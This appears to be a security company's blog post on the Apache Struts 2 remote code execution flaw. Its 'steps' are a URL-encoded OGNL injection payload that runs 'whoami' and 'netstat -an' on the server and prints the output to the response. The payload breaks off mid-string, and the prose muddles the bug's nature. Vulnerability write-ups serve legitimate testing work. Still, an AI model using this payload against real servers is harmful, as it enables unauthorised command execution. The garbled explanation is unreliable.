This blog is to describe my finding on a web-based application which is a very well-known vulnerability found on Apache Struts-2 Remote Code Execution (RCE).
Apache Struts is one of the popular open-source frameworks that are used mainly by banks and government organizations. It is modern, clean, elegant, but it does not provide exceptional security. The framework detected a remote code execution that allows the hacker to execute system commands remotely on any network or server that uses Apache Struts Framework along with a Rest Plugin, which is commonly used to run the application. The bug that was discovered was a vulnerability that starts with insecure deserialization but later leads to a remote execution code.
Here are some steps that you need to follow to check for the vulnerability for Apache Struts-2.
${%23a%3dnew%20java.lang.ProcessBuilder(new%20java.lang.String[]{%22whoami%22}).start().getInputStream(),%23b%3dnew%20java.io.InputStreamReader(%23a),%23c%3dnew%20java.io.BufferedReader(%23b),%23d%3dnew%20char[51020],%23c.read(%23d),%23screen%3d%23context.get(‘com.opensymphony.xwork2.dispatcher.HttpServletResponse’).getWriter(),%23screen.println(%23d),%23screen.close()}”>test.action?redirect:${%23a%3dnew%20java.lang.ProcessBuilder(new%20java.lang.String[]{%22netstat%22,%22-an%22}).start().getInputStream(),%23b%3dnew%20java.io.InputStreamReader(%23a),%23c%3dnew%20java
We offer various tailored security services to organizations to encounter their vulnerabilities and cyber-attacks. Security services like Cloud Security, Network Security, Application Security, Special Security Services, and more. You can also read about vulnerabilities and other cybersecurity attacks in our blog section.
Anyways it was FUN, Thanks for reading.
Author,
Sushant Kamble
Introduction In the era of digitalization, data security has become a paramount concern. Every day,…
I.Introduction Bluetooth has become an integral technology for billions of smartphones, computers, wearables, and other…
I. Introduction In today's ever-evolving cybersecurity landscape, staying ahead of adversaries has become a challenge.…
Introduction In an increasingly interconnected world, the financial industry is becoming more vulnerable to cyber…
Introduction In today's interconnected world, where smartphones are an extension of our lives, ensuring the…
Introduction Unseen and unpredictable, zero-day threats loom as a constant menace to modern businesses. Detecting…